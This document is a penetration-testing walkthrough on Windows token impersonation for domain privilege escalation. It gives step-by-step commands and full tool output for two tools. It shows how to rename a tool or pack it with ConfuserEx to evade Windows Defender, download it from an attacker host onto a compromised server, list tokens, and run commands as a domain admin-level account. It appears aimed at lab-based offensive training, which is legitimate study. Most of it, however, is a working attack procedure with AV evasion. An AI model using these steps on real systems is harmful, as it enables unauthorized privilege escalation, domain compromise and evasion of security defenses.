=========================================================================================================================================================
Domain Privesc - Privilege escalation by impersonating a highly privileged Domain account logged on a Windows server/laptop that we have compromised 
=========================================================================================================================================================

Token impersonation is a Windows post-exploitation technique that allows an attacker to steal the access token of a logged-on user on the system without
knowing their credentials and impersonate them to perform operations with their privileges.

During a penetration test, as soon as you obtain local administrator privileges over several Windows servers or laptops, you can use Windows authentication 
token impersonation techniques to run OS commands, binaries and C2 agents as any of the other users logged on these servers or laptops without knowing 
their passwords (or needing to dump them).
If one the logged accounts is highly privileged, then you can impersonate it to escalate your privileges and try to take over the entire Windows domain.

Numerous tools and scripts can be used to impersonate/manipulate/alter Windows authentication tokens in processes.
> https://github.com/S3cur3Th1sSh1t/SharpImpersonation
> https://github.com/0xbadjuju/Tokenvator
> https://github.com/sensepost/impersonate
> https://github.com/zblurx/impersonate-rs
> ...


=====================================================================================================================================
PoC/Basic example 1 - Windows token impersonation (using Sensepost's impersonate tool) of a highly privileged Domain account logged 
                      on a Windows server that we have compromised 
=====================================================================================================================================

------------------------------------------------------------------------------------------------------------------------------------
Step 1. Download, modify and compile the source code of the tool 'Impersonate'
------------------------------------------------------------------------------------------------------------------------------------

> https://github.com/sensepost/impersonate

I modified the source code and renamed the tool "audit.exe" to bypass AV detection.

------------------------------------------------------------------------------------------------------------------------------------
Step 2 - Download the tool on a target Windows server that you have compromised (Windows Defender AV is enabled)
------------------------------------------------------------------------------------------------------------------------------------

PS C:\Temp> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 8/6/2024 4:44:01 AM

PS C:\Temp> wget -URI http://192.168.10.10/audit.exe -OutFile C:\Temp\audit.exe

PS C:\Temp> dir audit.exe

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2024   6:32 PM         151552 audit.exe

------------------------------------------------------------------------------------------------------------------------------------
Step 3 - Use the tool to execute OS commands as a highly privileged Domain account logged on the target Windows server 
------------------------------------------------------------------------------------------------------------------------------------

> 3.1 - Start a CMD prompt as a local administrator (in our example we used the account 'lab\auditor')
------------------------------------------------------------------------------------------------------

PS C:\Temp> whoami
lab\auditor

PS C:\Temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

C:\Temp> Audit.exe
Usage:
- To list available tokens: Audit.exe list
- To escalate to domain admin: Audit.exe adduser <dom admin token id> <username> <password> <domain admin group> <domain controller>
- To run command: Audit.exe exec <token id> <command>

> 3.2 - Then use the tool to list all the available tokens and look for a highly privileged Domain account to impersonate
--------------------------------------------------------------------------------------------------------------------------

C:\Temp> Audit.exe list

[?] Enabling SeAssignPrimaryToken
        [*] SeAssignPrimaryToken owned!
        [*] SeAssignPrimaryToken enabled!
[?] Enabling SeDebugPrivilege
        [*] SeDebugPrivilege owned!
        [*] SeDebugPrivilege enabled!

[*] Listing available tokens
[ID:  0][SESSION: 0][INTEGRITY: High  ][TokenPrimary      ][                      ] User: AUTORITE NT/SystÞme
[ID:  1][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: AUTORITE NT/SystÞme
[ID:  2][SESSION: 2][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-2
[ID:  3][SESSION: 7][INTEGRITY: High  ][TokenPrimary      ][                      ] User: LAB/auditor
[ID:  4][SESSION: 0][INTEGRITY: High  ][TokenPrimary      ][                      ] User: LAB/webadmin
[ID:  5][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: AUTORITE NT/SERVICE R╔SEAU
[ID:  6][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Font Driver Host/UMFD-0
[ID:  7][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: AUTORITE NT/SERVICE LOCAL
[ID:  8][SESSION: 3][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: LAB/auditor
[ID:  9][SESSION: 1][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-1
[ID: 10][SESSION: 1][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-1
[ID: 11][SESSION: 2][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-2
[ID: 12][SESSION: 6][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-6
[ID: 13][SESSION: 8][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-8
[ID: 14][SESSION: 3][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-3
[ID: 15][SESSION: 7][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-7
[ID: 16][SESSION: 4][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-4
[ID: 17][SESSION: 6][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-6
[ID: 18][SESSION: 8][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Font Driver Host/UMFD-8
[ID: 19][SESSION: 5][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-5
[ID: 20][SESSION: 4][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-4
[ID: 21][SESSION: 7][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-7
[ID: 22][SESSION: 8][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: LAB/webadmin
[ID: 23][SESSION: 5][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: Window Manager/DWM-5
[ID: 24][SESSION: 3][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-3
[ID: 25][SESSION: 8][INTEGRITY: High  ][TokenPrimary      ][                      ] User: Window Manager/DWM-8
[ID: 26][SESSION: 8][INTEGRITY: Medium][TokenPrimary      ][                      ] User: LAB/auditor
[ID: 27][SESSION: 0][INTEGRITY: High  ][TokenPrimary      ][                      ] User: AUTORITE NT/SERVICE R╔SEAU
[ID: 28][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityIdentification] User: AUTORITE NT/SystÞme
[ID: 29][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityIdentification] User: AUTORITE NT/SERVICE LOCAL
[ID: 30][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityIdentification] User: AUTORITE NT/SERVICE R╔SEAU
[ID: 31][SESSION: 8][INTEGRITY:       ][TokenImpersonation][SecurityIdentification] User: LAB/auditor
[ID: 32][SESSION: 8][INTEGRITY:       ][TokenImpersonation][SecurityIdentification] User: Window Manager/DWM-8
[ID: 33][SESSION: 0][INTEGRITY: High  ][TokenPrimary      ][                      ] User: AUTORITE NT/SERVICE LOCAL
[ID: 34][SESSION: 0][INTEGRITY:       ][TokenImpersonation][SecurityImpersonation ] User: AUTORITE NT/ANONYMOUS LOGON
[ID: 35][SESSION: 0][INTEGRITY: Low   ][TokenPrimary      ][                      ] User: AUTORITE NT/SERVICE LOCAL
[ID: 36][SESSION: 8][INTEGRITY: Low   ][TokenPrimary      ][                      ] User: LAB/auditor
[ID: 37][SESSION: 8][INTEGRITY: Medium][TokenPrimary      ][                      ] User: LAB/webadmin

C:\Temp>

Result: 
=> In our LAB environement the domain account 'LAB\webadmin' is administrator of all the Windows servers hosting Web applications. 
   It is a good target to further compromise the Windows domain of our LAB environemnt.


> 3.3 - Impersonate the target account 'lab\webadmin' to run OS command (PoC 'whoami') with its privileges
-----------------------------------------------------------------------------------------------------------

C:\Temp> Audit.exe exec 4 "whoami > C:\Temp\poc.txt"

[?] Enabling SeAssignPrimaryToken
        [*] SeAssignPrimaryToken owned!
        [*] SeAssignPrimaryToken enabled!
[?] Enabling SeDebugPrivilege
        [*] SeDebugPrivilege owned!
        [*] SeDebugPrivilege enabled!
[*] Impersonating LAB/webadmin and launching command [cmd.exe /c whoami > C:\Temp\poc.txt] via CreateProcessWithTokenW

C:\Temp> dir poc.txt
 Volume in drive C is Windows
 Volume Serial Number is F06E-DC58

 Directory of C:\Temp

08/06/2024  06:46 PM                19 poc.txt
               1 File(s)             19 bytes
               0 Dir(s)  54,295,789,568 bytes free

C:\Temp> type poc.txt

lab\webadmin


=====================================================================================================================================
PoC/Basic example 2 - Windows token impersonation (using the tool SharpImpersonation) of a highly privileged Domain account logged 
                      on a Windows server that we have compromised 
=====================================================================================================================================

------------------------------------------------------------------------------------------------------------------------------------
Step 1. Download the source code of the tool 'SharpImpersonation', compile it and pack it to avoid static AV detection
------------------------------------------------------------------------------------------------------------------------------------

1.1 Download the source code from GitHub (https://github.com/S3cur3Th1sSh1t/SharpImpersonation) and compile it with Visual Studio
----------------------------------------------------------------------------------------------------------------------------------

Build started...
1>------ Build started: Project: SharpImpersonation, Configuration: Release Any CPU ------
1>C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\amd64\Microsoft.Common.CurrentVersion.targets(2352,5): warning MSB3274: 
The primary reference "System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL" could not be resolved because
it was built against the ".NETFramework,Version=v4.5" framework. 
This is a higher version than the currently targeted framework ".NETFramework,Version=v4.0".
1>C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\amd64\Microsoft.Common.CurrentVersion.targets(2352,5): warning MSB3275: 
The primary reference "System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL" could not be resolved because
it has an indirect dependency on the assembly "Microsoft.Management.Infrastructure.Native, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" which was built against
the ".NETFramework,Version=v4.5" framework. 
This is a higher version than the currently targeted framework ".NETFramework,Version=v4.0".
1>  SharpImpersonation -> C:\Users\auditor\Documents\Tools-Pentest\12-Privesc\Privesc-SharpImpersonation\SharpImpersonation\bin\Release\SharpImpersonation.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
========== Build started at 5:54 PM and took 06.276 seconds ==========


1.2 Pack the tool 'SharpImpersonation' with the .Net packer 'Confuser-EX'
--------------------------------------------------------------------------

 [INFO] Confuser.Core 1.6.0+447341964f Copyright © 2014 Ki, 2018 - 2022 Martin Karing
 [INFO] Running on Microsoft Windows NT 6.2.9200.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
 [INFO] Discovered 13 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'SharpImpersonation.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'SharpImpersonation.exe'...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'koi'...
[DEBUG] Encrypting resources...
 [INFO] Finalizing...
 [INFO] Packing...
[DEBUG] Encrypting modules...
 [INFO] Protecting packer stub...
[DEBUG] Discovering plugins...
 [INFO] Discovered 14 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'SharpImpersonation.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
[DEBUG] Executing 'Module injection' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'SharpImpersonation.exe'...
[DEBUG] Executing 'Packer info encoding' phase...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'SharpImpersonation.exe'...
 [INFO] Finalizing...
[DEBUG] Saving to 'C:\Users\auditor\AppData\Local\Temp\iu0ah2tx.drx\fw3ifpt1.h0s\SharpImpersonation.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Finish protecting packer stub.
[DEBUG] Saving to 'C:\Users\auditor\Documents\Tools-Pentest\12-Privesc\Privesc-SharpImpersonation\SharpImpersonation\bin\Release\Confused\SharpImpersonation.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Done.
Finished at 5:58 PM, 0:01 elapsed.

-----------------------------------------------------------------------------------------------------------------------------------------------------------
Step 2 - Download the packed version of the tool 'SharpImpersonation' on a target Windows server that you have compromised (Windows Defender AV is enabled)
-----------------------------------------------------------------------------------------------------------------------------------------------------------

C:\Temp> powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Temp> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 11/19/2023 11:18:47 AM


PS C:\Temp> wget -URI http://192.168.10.10/Packed-SharpImpersonation.exe -OutFile C:\Temp\Packed-SharpImpersonation.exe


-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Step 3 - Use the packed version of the tool 'SharpImpersonation' to execute OS commands as a highly privileged Domain account logged on the target Windows server 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

3.1 Start a CMD prompt as administrator, then use the tool 'SharpImpersonation' to list all the user processes and look for a highly privileged Domain account to impersonate
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

C:\Temp> Packed-SharpImpersonation.exe list
   _____ __                     ____                                                 __  _
  / ___// /_  ____ __________  /  _/___ ___  ____  ___  ______________  ____  ____ _/ /_(_)___  ____
  \__ \/ __ \/ __ `/ ___/ __ \ / // __ `__ \/ __ \/ _ \/ ___/ ___/ __ \/ __ \/ __ `/ __/ / __ \/ __ \
 ___/ / / / / /_/ / /  / /_/ // // / / / / / /_/ /  __/ /  (__  ) /_/ / / / / /_/ / /_/ / /_/ / / / /
/____/_/ /_/\__,_/_/  / .___/___/_/ /_/ /_/ .___/\___/_/  /____/\____/_/ /_/\__,_/\__/_/\____/_/ /_/
                     /_/                 /_/
                                            By: S3cur3Th1sSh1t, @ShitSecure

[-] NtQueryInformationToken failed: 0

UserName                      ProcessID
--------                      ---------
AUTORITE NT\Système           6892
AUTORITE NT\SERVICE RÉSEAU    4300
LAB\auditor                    13600
AUTORITE NT\SERVICE LOCAL     2896
Window Manager\DWM-1          2728
LAB\webadmin	             12548
Font Driver Host\UMFD-1       1404
Font Driver Host\UMFD-0       1396


C:\Temp> Packed-SharpImpersonation.exe list elevated
   _____ __                     ____                                                 __  _
  / ___// /_  ____ __________  /  _/___ ___  ____  ___  ______________  ____  ____ _/ /_(_)___  ____
  \__ \/ __ \/ __ `/ ___/ __ \ / // __ `__ \/ __ \/ _ \/ ___/ ___/ __ \/ __ \/ __ `/ __/ / __ \/ __ \
 ___/ / / / / /_/ / /  / /_/ // // / / / / / /_/ /  __/ /  (__  ) /_/ / / / / /_/ / /_/ / /_/ / / / /
/____/_/ /_/\__,_/_/  / .___/___/_/ /_/ /_/ .___/\___/_/  /____/\____/_/ /_/\__,_/\__/_/\____/_/ /_/
                     /_/                 /_/
                                            By: S3cur3Th1sSh1t, @ShitSecure

 [-] Function GetTokenInformation failed:
 [-] Access is denied
 [-] Function TokenElevationType failed:
 [-] Access is denied
 [-] Function GetTokenInformation failed:
 [-] The handle is invalid
 [-] Function TokenElevationType failed:
 [-] The handle is invalid

UserName                      ProcessID
--------                      ---------
LAB\auditor                    7508
LAB\webadmin	                12548


Result: 
=> In our LAB environement the domain account 'LAB\webadmin' is administrator of all the Windows servers hosting Web applications. 
   It is a good target to further compromise the Windows domain of our LAB environemnt.


3.2 Impersonate the target account 'lab\webadmin' to run OS command (PoC 'whoami') with its privileges
-------------------------------------------------------------------------------------------------------

C:\Temp> Packed-SharpImpersonation.exe user:LAB\webadmin binary:"powershell.exe whoami;pause"
   _____ __                     ____                                                 __  _
  / ___// /_  ____ __________  /  _/___ ___  ____  ___  ______________  ____  ____ _/ /_(_)___  ____
  \__ \/ __ \/ __ `/ ___/ __ \ / // __ `__ \/ __ \/ _ \/ ___/ ___/ __ \/ __ \/ __ `/ __/ / __ \/ __ \
 ___/ / / / / /_/ / /  / /_/ // // / / / / / /_/ /  __/ /  (__  ) /_/ / / / / /_/ / /_/ / /_/ / / / /
/____/_/ /_/\__,_/_/  / .___/___/_/ /_/ /_/ .___/\___/_/  /____/\____/_/ /_/\__,_/\__/_/\____/_/ /_/
                     /_/                 /_/
                                            By: S3cur3Th1sSh1t, @ShitSecure


[*] Username given, checking processes
[-] NtQueryInformationToken failed: 0
[-] NtQueryInformationToken failed: 0

[+] Found process for user LAB\webadmin with PID: 12548

[*] Adjusting Token Privilege
SeDebugPrivilege
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeDebugPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED

 [*] Changing WINSTA/Desktop permissions for the target user: LAB\webadmin
 [*] Setting Permission for : LAB\webadmin

[*] Stealing token from ProcID: 12548 to start binary: powershell.exe whoami;pause
[+] Recieved Handle for:  (12548)
 [+] Process Handle: 0x0430
[+] Primary Token Handle: 0x040C
 [+] Duplicate Token Handle: 0x0430
[*] Adjusting Token Privilege
SeAuditPrivilege
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeAuditPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED
[*] CreateProcessWithTokenW
Starting C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe with arguments whoami;pause
Tried starting process, return value is True
 [+] Created process: 3380
 [+] Created thread: 3092

C:\Temp>

Windows PowerShell - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
LAB\webadmin
Cliquez sur Entrée pour continuer...:

Results
--------
=> A new PowerShell prompt appeared with the result of our command "whoami".
=> The attack worked! 
